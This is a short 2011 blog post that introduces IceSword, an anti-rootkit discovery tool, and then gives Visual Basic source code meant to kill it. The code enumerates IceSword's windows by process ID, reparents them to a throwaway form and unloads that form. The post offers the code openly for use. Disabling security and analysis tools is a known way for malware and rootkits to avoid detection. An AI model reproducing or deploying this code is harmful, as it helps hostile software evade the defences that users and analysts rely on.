Saturday, April 2, 2011

[Visual Basic] Kill IceSword Source Code

IceSword has a Windows Explorer-like interface but displays hidden processes and resources that Windows Explorer would never show. It isn't a "click-here-to-delete-rootkits" product but a sophisticated discovery tool that can protect against sinister rootkits if used before they infect a machine.

You can download from
Direct Download
Author Website

The Below is the function to kill this IceSword :)

Option Explicit 

Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long 
Private Declare Function EnumWindows Lib "user32" (ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long 
Private Declare Function SetParent Lib "user32" (ByVal hWndChild As Long, ByVal hWndNewParent As Long) As Long 

Private Currenthwnd As Long 
Private CurrentPid As Long 
Private IceSwordPid As Long 
Private IceSwordhwnds() As Long 
Private NumOfhwnds As Long 

Public Sub KillIceSwordByPid(ByVal Pid As Long) 
Dim i As Long 
IceSwordPid = Pid 
EnumWindows AddressOf EnumWindowsProc, 0& 
Dim KillForm As New TestForm'TestForm is a form's name.(You must have a form! or you can use CreateWindow(Ex)) 
For i = LBound(IceSwordhwnds) To UBound(IceSwordhwnds) 
     SetParent IceSwordhwnds(i), KillForm.hwnd 
Next i 
Unload KillForm 
End Sub 

Public Function EnumWindowsProc(ByVal hwnd As Long, ByVal lParam As Long) As Boolean 
Currenthwnd = hwnd 
GetWindowThreadProcessId Currenthwnd, CurrentPid 
If CurrentPid = IceSwordPid Then 
     NumOfhwnds = NumOfhwnds + 1 
     ReDim Preserve IceSwordhwnds(NumOfhwnds - 1) 
     IceSwordhwnds(NumOfhwnds - 1) = Currenthwnd 
End If 
EnumWindowsProc = True 
End Function 

0 comments for "[Visual Basic] Kill IceSword Source Code"

Post a Comment